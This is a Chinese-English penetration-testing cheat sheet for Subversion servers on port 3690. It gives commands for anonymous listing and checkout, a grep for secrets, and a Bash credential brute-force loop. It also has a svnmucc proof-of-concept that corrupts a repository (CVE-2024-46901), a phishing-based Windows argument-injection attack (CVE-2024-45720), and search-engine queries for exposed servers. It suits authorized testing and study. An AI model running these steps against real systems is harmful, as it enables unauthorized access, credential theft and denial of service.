3690 - Svn

💡 学习提示: 本文档介绍 3690 - Subversion SVN 的渗透测试方法,适合信息安全初学者和从业人员参考。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

⚠️ 法律声明: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。

3690/tcp - 渗透测试 Subversion (SVN) 服务器

基本信息

Subversion (SVN) is a centralized version control system (Apache license) used for software versioning and revision control.

默认 port: 3690/tcp (svnserve). It can also be exposed via HTTP/HTTPS through mod_dav_svn and via svn+ssh.

PORT     STATE SERVICE
3690/tcp open  svnserve Subversion
nc -vn 10.10.10.10 3690
svnserve --version           # if shell access is obtained
svn --version                # client version leak via error messages

信息收集

## Anonymous / authenticated listing
svn ls svn://10.10.10.203                  # list root
svn ls -R svn://10.10.10.203/repo         # recursive list
svn info svn://10.10.10.203/repo          # repo metadata
svn log svn://10.10.10.203/repo           # commit history
svn checkout svn://10.10.10.203/repo      # checkout repository
svn up -r 2                               # move working copy to revision 2
svn diff -r 1:HEAD svn://10.10.10.203/repo   # view changes

## If served over HTTP(S)
svn ls https://10.10.10.10/svn/repo --username guest --password ''

## Extract revision props (often contain build creds, URLs, tokens)
svn propget --revprop -r HEAD svn:log svn://10.10.10.203/repo

Auth & Misconfig Hunting

  • svnserve.conf may allow anon-access = read (or even write). If you can list, try checkout to dump secrets, scripts, CI tokens.
  • Repositories frequently store build pipelines, deployment keys, and database credentials in versioned config files. Grep the working copy after checkout: grep -R "password\|secret\|token" -n ..
  • If svn+ssh is enabled, user shells often allow restricted svnserve commands; attempt ssh user@host svnserve -t with crafted subcommands to bypass wrappers.

Bruteforcing credentials (svnserve)

sasl authentication (if enabled) and simple password files are protected only by the transport; no lockout by default. A quick Bash loop can try credentials:

for u in admin dev ci; do
  for p in $(cat /tmp/passlist); do
    svn ls --username "$u" --password "$p" svn://10.10.10.203/repo 2>/dev/null && echo "[+] $u:$p" && break
  done
done

Recent Vulnerabilities (practical impact)

mod_dav_svn 拒绝服务 via control characters (CVE-2024-46901)

  • A user with commit rights can write a path containing control chars (e.g. \x01, \x7f) that corrupts the repository, making later checkouts/logs fail and potentially crashing mod_dav_svn workers.
  • Affects Subversion ≤ 1.14.4 when served through HTTP(S) (mod_dav_svn). Fixed in 1.14.5.
  • PoC commit with svnmucc (requires valid commit creds):
## create payload file
printf 'pwn' > /tmp/payload
## commit a path with a control character in its name
svnmucc -m "DoS" put /tmp/payload $'http://10.10.10.10/svn/repo/trunk/bad\x01path.txt'
  • After the commit, normal clients may crash or refuse updates until admins manually remove the revision with svnadmin dump/filter/load.

Windows argument injection in svn client (CVE-2024-45720)

  • On Windows, “best-fit” character encoding in svn.exe allows command-line argument injection when processing specially crafted non‑ASCII paths/URLs, potentially leading to arbitrary program execution.
  • Affects Subversion ≤ 1.14.3 on Windows only; fixed in 1.14.4. 攻击 surface: phishing a developer to run svn on an attacker-controlled URL/path.
  • Pentest angle: if you control a network share or ZIP given to a Windows dev, name a repo URL or working-copy path containing best-fit bytes that decode into " & calc.exe & "-style injected args, then trick the victim to run svn status or similar on that path.

Notes for 漏洞利用 Workflow

  1. Check access method: svn:// (svnserve), http(s)://.../svn/ (mod_dav_svn), or svn+ssh://.
  2. Try anonymous read first; then spray common creds. If HTTP Basic is used, reuse creds found elsewhere.
  3. Enumerate hooks: hooks/pre-commit, post-commit scripts sometimes contain plaintext credentials or hostnames.
  4. Leverage svn:externals to pull additional paths from other hosts; list them with svn propget svn:externals -R . after checkout.
  5. Version leaks: HTTP response headers from mod_dav_svn usually show the Subversion & Apache version; compare against 1.14.5 to spot vuln targets.
  6. If you obtain filesystem access to the repo, svnadmin dump/svnlook author/svnlook dirs-changed allow offline analysis without credentials.

搜索引擎语法

FOFA

# FOFA 搜索语法
port="3690"

Shodan

# Shodan 搜索语法
port:3690

ZoomEye

# ZoomEye 搜索语法
port:3690

📖 参考资料